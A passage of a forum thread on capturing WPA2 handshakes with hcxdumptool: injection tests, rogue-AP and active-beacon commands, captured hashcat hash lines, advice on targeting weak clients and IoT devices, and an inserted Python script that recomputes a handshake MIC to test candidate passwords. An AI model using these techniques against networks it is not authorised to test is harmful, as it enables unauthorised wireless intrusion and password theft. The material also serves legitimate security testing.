hcxdumptool - missing frames w/ filtering
#11
mt7921u is a new driver:
https://github.com/morrownr/USB-WiFi/issues/137
and we have to expect a lot of issues on it.

rtl8814au depends on NETLINK and hcxdumptool doesn't use NETLINK.

AWUS036ACM is working fine.

Please note that the range on 5 GHz is less than half of that on 2.4 GHz.
Reply
#12
Thanks! I’ll try 36ACM
Reply
#13
A nice video is here:
https://www.youtube.com/watch?v=Usw0IlGbkC4
Reply
#14
Thanks again! I saw it already a couple of weeks ago. It was impressive when I saw it, but when I tried to brute force my 10+ character WPA2 password on an NVIDIA V100, I realized that the video is actually "tricked". How the hell does he know which mask to use for hashcat? If the password is 8 characters with digits only, ok, it took 30 min to brute force on the NVIDIA V100.
Reply
#15
Testing ACM36 now with stock antennas. First I tried injection:
Code:
$ sudo hcxdumptool -i wlan0 --check_injection -c 6
initialization of hcxdumptool 6.2.6 (depending on the capabilities of the device, this may take some time)...
starting antenna test and packet injection test (that can take up to two minutes)...
stage 2 of 2 probing frequency 5865/173 proberesponse 107 
packet injection is working on 2.4GHz!
injection ratio: 21% (BEACON: 503 PROBERESPONSE: 107)
your injection ratio is poor - improve your equipment and/or get closer to the target
antenna ratio: 31% (NETWORK: 22 PROBERESPONSE: 7)
your antenna ratio is average, but there is still room for improvement

After that I turned off my AP and ran hcxdumptool with an ESSID list in the beacon:
Code:
sudo hcxdumptool -i wlan0 -o dump.pcapng --enable_status=31 --essidlist=essid --active_beacon

SSID.......: ASK88
MAC_AP.....: 00054fca9e3c (Unknown)
MAC_CLIENT.: a07817ab4970 (Unknown)
VERSION....: 802.1X-2004 (2)
KEY VERSION: WPA2
REPLAYCOUNT: 63804
RC INFO....: ROGUE attack / NC not required
MP M1M2 E2.: challenge
MIC........: fdf1586b39920f78be6265942dcb96e8
HASHLINE...: WPA*02*fdf1586b39920f78be6265942dcb96e8*00054fca9e3c*a07817ab4970*41534b3838*5f163f74b712f513da4d89290b49282e661e1f86f90958873a063de9dd3c0a8d*0203007502010a0010000000000000f93c8b153e17d1c69ff3b457c403d2b9c7ae3efc4fb1e864f38890b333bcaa0ef8fd000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac020100000fac040100000fac020c00*10

SSID.......: ASK88
MAC_AP.....: 00054fca9e3c (Unknown)
MAC_CLIENT.: dce99422f2a4 (Unknown)
VERSION....: 802.1X-2001 (1)
KEY VERSION: WPA2
REPLAYCOUNT: 63804
RC INFO....: ROGUE attack / NC not required
MP M1M2 E2.: challenge
MIC........: ccaf2a25d20ceb5817fb6707cc8c8ab9
HASHLINE...: WPA*02*ccaf2a25d20ceb5817fb6707cc8c8ab9*00054fca9e3c*dce99422f2a4*41534b3838*5f163f74b712f513da4d89290b49282e661e1f86f90958873a063de9dd3c0a8d*0103007502010a0000000000000000f93c1399badf3e231b14299562944641368fc032a0c91da5441cf8f00a09e9d4abe0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac020100000fac040100000fac020c00*10
I got two hashes from clients.

After that I turned on the AP and ran hcxdumptool in standard mode:
Code:
sudo hcxdumptool -i wlan0 -o dump.pcapng --enable_status=31

SSID.......: ASK88
MAC_AP.....: 0024fbc000e1 (Unknown)
MAC_CLIENT.: dce99422f2a4 (Unknown)
VERSION....: 802.1X-2001 (1)
KEY VERSION: WPA2
REPLAYCOUNT: 63129
RC INFO....: ROGUE attack / NC not required
MP M1M2 E2.: challenge
MIC........: 2068dcdb59d1472326a69744223463c5
HASHLINE...: WPA*02*2068dcdb59d1472326a69744223463c5*0024fbc000e1*dce99422f2a4*41534b3838*3df826a2aca69b771ce04743bb5602bb06fcfd6d1f006c04d487847758a78399*0103007502010a0000000000000000f6994458ce666c1df885334f1934042ad574181fc118864d1d90e6af6f3e6103e89f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac020100000fac040100000fac020c00*10

While attacking clients I got two hashes. While attacking the AP I got the AP's one ;)

From all obtained hashes the password was recovered.

The question is: what are the benefits of attacking a client vs attacking the AP?
Reply
#16
Nice to hear that it is working as expected.

It is much easier to attack a weak CLIENT than a hardened ACCESS POINT.
It is much easier to get within range of a mobile CLIENT than to get within the range of a stationary AP.
In every case an EAPOL M2 of a CLIENT is unencrypted.
You get a lot of useful information from EAP identity frames and undirected PROBEREQUEST frames coming from a CLIENT.
Depending on the wpa-supplicant.conf of a CLIENT you'll get hashes of all(!) entries of this conf.
You do not need nonce-error-corrections (hashcat --nonce-error-corrections=0), which speeds up hashcat.

Let us say you are a penetration tester and have received the order to check the security of a large company.
You located the ACCESS POINT, attacked it and you got a PMKID and/or a 4way handshake.
Next step is to run hashcat to check if the PSK of the AP is weak. That will take a while, and if it is not weak, you may think everything is well secured, because hashcat was not able to recover the PSK.
Now run hcxdumptool and attack all CLIENTs connected to this AP. If only one CLIENT is weak (transmits the PSK within a PROBEREQUEST or EAP identity frame) you have got the secured PSK, e.g.:
if a user made a typo (typed the PSK instead of the ESSID and the ESSID instead of the PSK), this information is now stored in its wpa-supplicant.conf and the device transmits the PSK in the form of undirected PROBEREQUEST frames.
The more CLIENTs, the better the chance to identify a weak one, and the entire company is compromised.
BTW:
The injection ratio and the antenna ratio depend on many factors:
TX power of target (TX power of the attack device should always be the same as the TX power of the target device)
RX sensitivity of target
RX sensitivity of attack device
Frequency
Antenna gain of target
Antenna gain of attack device
Fresnel zone
Assignment of a radio channel (802.11 use time slots which allow a station to transmit or not)
and more...

hcxdumptool is measuring in both directions (attack device -> target and target -> attack device).
If you run the injection test several times, you'll get several different results, depending on the parameters mentioned above which are highly unpredictable.

But anyway, 802.11 is packet oriented and it is more than enough if a few packets (mostly 3) reach the target and a few packets (mostly 3) reach the attack device.
Reply
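The HASHLINE entries printed in post #15 and the "ROGUE attack / NC not required" remark that post #16 ties to hashcat's --nonce-error-corrections can both be checked offline. The script below is an added example, not code from this thread, from hcxdumptool or from hashcat: it splits a hashcat 22000 (WPA*02*) line into its fields, decodes the EAPOL M2 header it carries (replay counter, key descriptor version, SNONCE, message-pair bitmask) and recomputes the MIC for a candidate PSK the same way a cracker does (PBKDF2 to the PMK, PRF-512 to the KCK, HMAC over the MIC-zeroed EAPOL). The sample line is the first client hash from post #15, written out field by field; the thread does not state the recovered password, so the script can only demonstrate the mechanics and confirm that a wrong candidate does not match. Field layout and the meaning of bit 4 of the message-pair byte (AP-less capture, no nonce error correction needed) follow the hcxtools description of the 22000 format.

```python
"""Decode a hashcat 22000 (WPA*02*) line printed by hcxdumptool and test a PSK against it."""
import hashlib
import hmac

# EAPOL M2 of the first client hash in post #15, split into fields for readability.
# The MIC inside it is zeroed, exactly as the 22000 format stores it.
_EAPOL_M2 = (
    "0203007502010a0010000000000000f93c"                                 # 802.1X hdr, descriptor, key info, key len, replay counter
    "8b153e17d1c69ff3b457c403d2b9c7ae3efc4fb1e864f38890b333bcaa0ef8fd"   # SNONCE
    + "00" * 48                                                          # key IV, RSC, ID, MIC (zeroed)
    + "0016" "30140100000fac020100000fac040100000fac020c00"              # key data length + RSN IE
)

SAMPLE_LINE = "*".join([
    "WPA", "02",
    "fdf1586b39920f78be6265942dcb96e8",                                  # MIC
    "00054fca9e3c",                                                      # MAC_AP
    "a07817ab4970",                                                      # MAC_CLIENT
    "41534b3838",                                                        # ESSID "ASK88" as hex
    "5f163f74b712f513da4d89290b49282e661e1f86f90958873a063de9dd3c0a8d",  # ANONCE
    _EAPOL_M2,
    "10",                                                                # message pair
])


def parse_22000(line: str) -> dict:
    """Split a WPA*02* line and decode the EAPOL-Key header it embeds."""
    fields = line.strip().split("*")
    if len(fields) != 9 or fields[0] != "WPA":
        raise ValueError("not a hashcat 22000 line")
    _, htype, mic, mac_ap, mac_client, essid_hex, anonce, eapol_hex, mp = fields
    if htype != "02":
        raise ValueError("only EAPOL lines (WPA*02*) are handled, not PMKID (WPA*01*)")
    eapol = bytes.fromhex(eapol_hex)
    # EAPOL-Key layout: version(1) type(1) body_len(2) | desc_type(1) key_info(2) key_len(2)
    # replay_counter(8) nonce(32) iv(16) rsc(8) id(8) mic(16) key_data_len(2) key_data(...)
    if len(eapol) < 99 or len(eapol) != 4 + int.from_bytes(eapol[2:4], "big"):
        raise ValueError("EAPOL length field does not match the data")
    key_info = int.from_bytes(eapol[5:7], "big")
    message_pair = int(mp, 16)
    return {
        "mic": mic,
        "mac_ap": mac_ap,
        "mac_client": mac_client,
        "essid_bytes": bytes.fromhex(essid_hex),
        "essid": bytes.fromhex(essid_hex).decode("utf-8", "replace"),
        "anonce": anonce,
        "snonce": eapol[17:49].hex(),
        "eapol_version": eapol[0],                  # 1 = 802.1X-2001, 2 = 802.1X-2004 (hcxdumptool's VERSION line)
        "replay_counter": int.from_bytes(eapol[9:17], "big"),
        "key_descriptor_version": key_info & 0x7,   # 1 = HMAC-MD5 (WPA), 2 = HMAC-SHA1 (WPA2), 3 = AES-128-CMAC
        "message_pair": message_pair & 0x7,         # 0 = M1+M2, EAPOL from M2 ("challenge")
        "ap_less": bool(message_pair & 0x10),       # rogue/AP-less capture: nonce error correction not needed
        "eapol": eapol,
    }


def compute_mic(psk: str, p: dict) -> str:
    """PMK -> PTK -> KCK for a candidate PSK, then the M2 MIC as hashcat would compute it."""
    pmk = hashlib.pbkdf2_hmac("sha1", psk.encode(), p["essid_bytes"], 4096, 32)
    aa, spa = bytes.fromhex(p["mac_ap"]), bytes.fromhex(p["mac_client"])
    an, sn = bytes.fromhex(p["anonce"]), bytes.fromhex(p["snonce"])
    data = min(aa, spa) + max(aa, spa) + min(an, sn) + max(an, sn)
    # PRF-512: concatenate HMAC-SHA1(PMK, "Pairwise key expansion" || 0x00 || data || i) for i = 0..3
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    kck = ptk[:16]
    kdv = p["key_descriptor_version"]
    if kdv == 1:
        digest = hmac.new(kck, p["eapol"], hashlib.md5).digest()
    elif kdv == 2:
        digest = hmac.new(kck, p["eapol"], hashlib.sha1).digest()
    else:
        raise NotImplementedError("key descriptor version 3 (AES-128-CMAC) is not handled here")
    return digest[:16].hex()


def verify_psk(line: str, psk: str) -> bool:
    """True if the candidate PSK reproduces the MIC stored in the hash line."""
    p = parse_22000(line)
    return hmac.compare_digest(compute_mic(psk, p), p["mic"])


if __name__ == "__main__":
    info = parse_22000(SAMPLE_LINE)
    for key, value in info.items():
        if key not in ("eapol", "essid_bytes"):
            print(f"{key:>22}: {value}")
    # "12345678" is only hcxdumptool's default weak candidate; the real PSK is not in the thread.
    print("PSK 12345678 matches:", verify_psk(SAMPLE_LINE, "12345678"))
```

An "ap_less" result of True is what hcxdumptool reports as "ROGUE attack / NC not required": the SNONCE came from the client answering our rogue M1, so the ANONCE is ours and cannot have drifted, which is why post #16 says --nonce-error-corrections=0 is safe for these hashes.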
#17
I forgot to mention WiFi based IoT devices. A lot of them are weak (mostly due to wireless misconfiguration):
WiFi based coffee machines, toothbrushes, bathroom scales, door bells, security cams, and much more...
hcxdumptool will help to identify the weak CLIENTs.
Reply
#18
I tried to attack CLIENTs while my AP is ON. The result is that no client hashes were obtained, only my AP's hash. It looks like attacking clients assumes that they must be out of the AP's range, or the AP must be off. Is that correct?
Reply
#19
That highly depends on the command line options. Add your target ESSID to the beaconlist and activate active beaconing:
Code:
$ sudo hcxdumptool -i INTERFACE -o dump.pcapng --enable_status=63 --essidlist=beaconlist --active_beacon
Real time display will now show something like this:
Code:
start capturing (stop with ctrl+c)
NMEA 0183 SENTENCE........: N/A
PHYSICAL INTERFACE........: phy0
INTERFACE NAME............: wlp39s0f3u1u1u2
INTERFACE PROTOCOL........: IEEE 802.11
INTERFACE TX POWER........: 20 dBm (lowest value reported by the device)
INTERFACE HARDWARE MAC....: 00e0614861dd (not used for the attack)
INTERFACE VIRTUAL MAC.....: 00e0614861dd (not used for the attack)
DRIVER....................: mt7601u
DRIVER VERSION............: 5.17.4-arch1-1
DRIVER FIRMWARE VERSION...: N/A
openSSL version...........: 1.1
ERRORMAX..................: 100 errors
BPF code blocks...........: 0
FILTERLIST ACCESS POINT...: 0 entries
FILTERLIST CLIENT.........: 0 entries
FILTERMODE................: unused
WEAK CANDIDATE............: 12345678
ESSID list................: 0 entries
ACCESS POINT (ROGUE)......: 000d58c1ce00 (BROADCAST WILDCARD used for the attack)
ACCESS POINT (ROGUE)......: 000d58c1ce01 (BROADCAST OPEN used for the attack)
ACCESS POINT (ROGUE)......: 000d58c1ce02 (used for the attack and incremented on every new client)
CLIENT (ROGUE)............: c02250adb8f5
EAPOLTIMEOUT..............: 20000 usec
EAPOLEAPTIMEOUT...........: 2500000 usec
REPLAYCOUNT...............: 61716
ANONCE....................: 90fe8fc68c095d20c062252428a1654cef944a1a6de60667fde0cecad0f6fb2c
SNONCE....................: 601f7f1a918f639df71a84274c7f8f75ca00da57a24a8646c92305766c36c26b

TIME     FREQ/CH  MAC_DEST     MAC_SOURCE   ESSID [FRAME TYPE]
11:28:33 2472/13  ffffffffffff 0896d798e19e [WILDCARD BEACON]
11:28:34 2472/13  f6c56a62c874 0896d798e19e TEST-HIDDEN-ESSID [PROBERESPONSE]
11:46:43 2462/11  00e62d021987 0896d798e19e TEST-HIDDEN-ESSID [ROGUE PROBERESPONSE]
11:28:39 2472/13  00e62d021987 0896d798e19e TEST-HIDDEN-ESSID [AUTHENTICATION]
11:28:39 2472/13  00e62d021987 0896d798e19e TEST-HIDDEN-ESSID [ASSOCIATION]
11:28:39 2472/13  00e62d021987 0896d798e19e TEST-HIDDEN-ESSID [EAPOL:M1M2ROGUE EAPOLTIME:2121 RC:61716 KDV:2 PSK:12345678]
11:28:40 2472/13  00e62d021987 0896d798e19e TEST-HIDDEN-ESSID [EAPOL:M2M3 EAPOLTIME:1950 RC:3 KDV:2]
11:28:40 2472/13  00e62d021987 0896d798e19e TEST-HIDDEN-ESSID [EAPOL:M3M4ZEROED EAPOLTIME:3329 RC:3 KDV:2]

Explanation:
A CLIENT will not leave the AP it is connected to, if it doesn't receive a BEACON advertising better conditions.
And as a bonus, it will unhide a hidden ESSID.
Reply
#20
My command line was exactly the same as when I attacked clients with my AP OFF:
Code:
sudo hcxdumptool -i wlan0 -o dump.pcapng --enable_status=31 --essidlist=essid --active_beacon
but this time my AP was ON and the result was no client hashes, which means that my AP provides better conditions to clients than my ACM adapter. BTW I'm using VMware Fusion to host Kali to run hcxdumptool, which is not recommended in --help? Is it much better to run dedicated hardware for the ACM adapter?

Now, to target my IoT coffee maker or other smart devices: they are always connected to my AP. So to attack them effectively, do I need to be much closer to them with my antenna, compared to their distance to the AP?
Reply